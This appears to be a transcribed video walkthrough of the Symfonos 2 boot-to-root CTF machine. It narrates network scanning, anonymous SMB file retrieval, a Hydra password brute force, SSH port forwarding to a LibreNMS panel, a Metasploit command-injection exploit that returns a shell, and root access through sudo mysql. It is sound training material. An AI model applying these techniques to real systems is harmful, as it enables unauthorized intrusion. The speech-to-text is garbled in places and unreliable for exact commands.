Hello friends, today we are take a SYMFONOS 2 machine learning about the boot to root challenge CTF. So as you can see that there is description OSCP like intermediate real life based machine design to teach the importance of understanding a vulnerability should work for both VMware and VirtualBox. We are using the VirtualBox and now let's see the VirtualBox. I am already start the machine. After the setup you start the machine and now let's scan the network. For scanning the network we are using the ARP scan sudo ARP scan -l. As you know that in the DC series the VulnHub as usually use the PCS system technique. So there is PCS system technique. So our IP is my machine IP is 192.168.1.159. So let's run a scan through the nmap, but now I'm using the nmap automator. So let's compile the nmap automator. You can see that dot slash for the compiling nmap automated dot sh file 192.168.1.159 our IP target machine IP and all for the techniques. Let's enter. Now you can see this we are in the user, we are not in the root user, that's why it's asking the password. Let's enter the password. Now it takes some time. As you see can there is old default nm for linux foof nicto smb client smb map snmap check snmap work. There are many scans because the automated tool always use the all scan. So let's check. Starting port scan, there are 5 port open, 21 TCP, FTP protocol, SSH protocol and HTTP protocol, and NetBIOS and Microsoft DBS. And there is port FTP protocol, Pro FTPD 1.3.5. As you know that there is FTP service and version, so I think so it's vulnerable. Let's see that. And SSS also, and port number 80. So port number 80, it's a web based. So let's check our IP 192.168.1. So sorry, 192.168.1.159. So it's a website. After that there is 139 NetBIOS Samba workgroup services. There's operating system is Unix Linux. So basically it's a Linux based operating system. Now you can see this host script. We are enumerate whole thing. As you can see that there is UDP ports also and running for CV scan all ports, VLAN scans. Basically these scan give a exploit also. Pro FTPD, it's vulnerable. let's check the thing. Now we run the nm for Linux scan. So let's see the nm for Linux. There is Nikto. Where is the nm for Linux? For so as you can see that starting SMB client scan, there is SMB client scan. We have also a SMB client port. We can use the SMB client scan. There is three file that's automatically scanned, and nm for Linux also. So we got the three files. Let's connect through the SMB client. So open a new tab and split SMB client. I'm already set this, and basically we got the SMB client. In the work group there is name of anonymous. So let's check the anonymous. What is that? Just a minute. Changing the path. Now SMB client 192 / 192.168.1.5 our machine IP. SYMFONOS is 2. There is SMB client work group anonymous. So let's enter. For the password, normal enter because there is no password. Let's check ls. Now you can see that there is 4 files backups. So first of all we are check the backups. cd backups. Now ls. Now you can see that in the backup there is a file log.txt. Let's get this file. I think so there is some confidential credential information in this file. Check the file because it's log file log.txt. Get. So we are get this file. So let's check ls. Here you can see that log.txt get log.txt. Now see this cat log.txt root SYMFONOS 2. Sheet slash shadow var backups shadow.back samba configuration sample configuration file for the samba short for Debian. So if you think, let's check this file whole content. We found a username. There is a path slash home alias slash share. So alias, it's a username, but we don't know about the passwords. So let's brute force on this. Copy this username and use the Hydra tool for the brute force. Hydra hyphen L alias hyphen P for password. We are using the file roku.txt and protocol FTP protocol. We are want to log into SSH, but there was some error, so we are using the FTP protocol because there is information in FTP protocol. Let's enter it. Wait some time. As you can see this in the FTP protocol, our alias user, we are successfully for the brute forcing. Now let's connect to the SSH. It takes some time, that's why I'm skipping this video. So first of all, our login username is alias and the password is password copy. After that, open a new tab in a split view. Let's connect the SSH, but we are connecting in the root user. There is some problem. SSH alias at the rate 192.168.1.159. Let's enter. Copy the password. Enter. Now you can see that we are connected to the SSH user alias. Let's check the present working directory. ls, there is a share folder, but I'm see this there is a one more thing, because this website is one on Apache server and there is two service also running, MySQL service and another service running on port number 8080. Let's check this another website. So we are going to this path cd slash etc slash apache 2 slash sites enabled slash. Now ls, there is a file of librans.config. Let's check this through the cat command. libran.config.conf. Now you can see this, there is virtual host 127.0.0 document root opt libran nms html. So there is libran nms. So let's log in through the password. But it's now not, there is no login page. So we are connecting a local host. We are cancel this cell and another ssh hyphen l in a local host. SSH space space hyphen L space 8080 port number, because you can see that there is 8080 port number and 127.0.0.1. It's a local host, virtual host through the alias. Let's connect. Password is same as that. We are again connect. Now open a local host, port number 8080. So you can see this, there is libre nms. Let's try to log in through the alias. The password is, now you can see this, we are in logged in libre nms. So I think it's a vulnerability. Let's search the exploit for the libre nms. We are using the metasploit framework. Through the command is msf console. Search. Libre nms. There is two payload: exploit Linux, HTTP libre nms, collected cmd injection, and add host injection. We are using add host injection. There is two reasons: because cmd injection is not working and I'm already tried it. So use the exploit add host. Number first, let's check the options. What are the requirements? Set the password. Set the R host. We are set in R host, local host. Set R host, local host, because we are using the local host, and R port is 8080. R port 8080. After that there is username requirement. Set username. Username is aliens. AEOLUS. Let's check again. AEOLUS. Set the host. So let's check our IP. ifconfig. So our IP is 192.168.1.34. So let's go back to the Metasploit framework. Set lhost 192.168.1.34. So again let's check the options. Sorry. So password is set. R host localhost set. R port 8080 set. Username is set. L host and L port also set. Let's exploit. Now you can see this. There is session 1 created in the background. Let's check the sessions. There is session ID 1. So sessions -I 1. Let's enter this, just a sec. So our ID session ID is 1. Let's enter. So we got the cell. Let's stabilize the cell. Use the command python. Now you can see this. Now we are in Craw SYMFONOS 2, other user. Let's check. There is sudo permissions, sudo -I for the privilege escalation -L. Now you can see this, there is privilege escalation for the permission in user bin. So let's change the directory cd/user/bin, and we are using, there is a command that time there is a service running, MySQL service running. So there is a command for the MySQL for sudo. So let's use this command. Now you can see this, we got the root shell. Let's check this. Who am I? Root cd/root ls. There is a file proof.txt. So let's get command, file name proof.txt. So finally, congratulations, we are captured this SYMFONOS 2 offensive machine. So there is the old method, and for the password cracking there is one more method. I will not show you. There is also one more method. With the brute force we can use the SMB client also. So thanks for watching this video.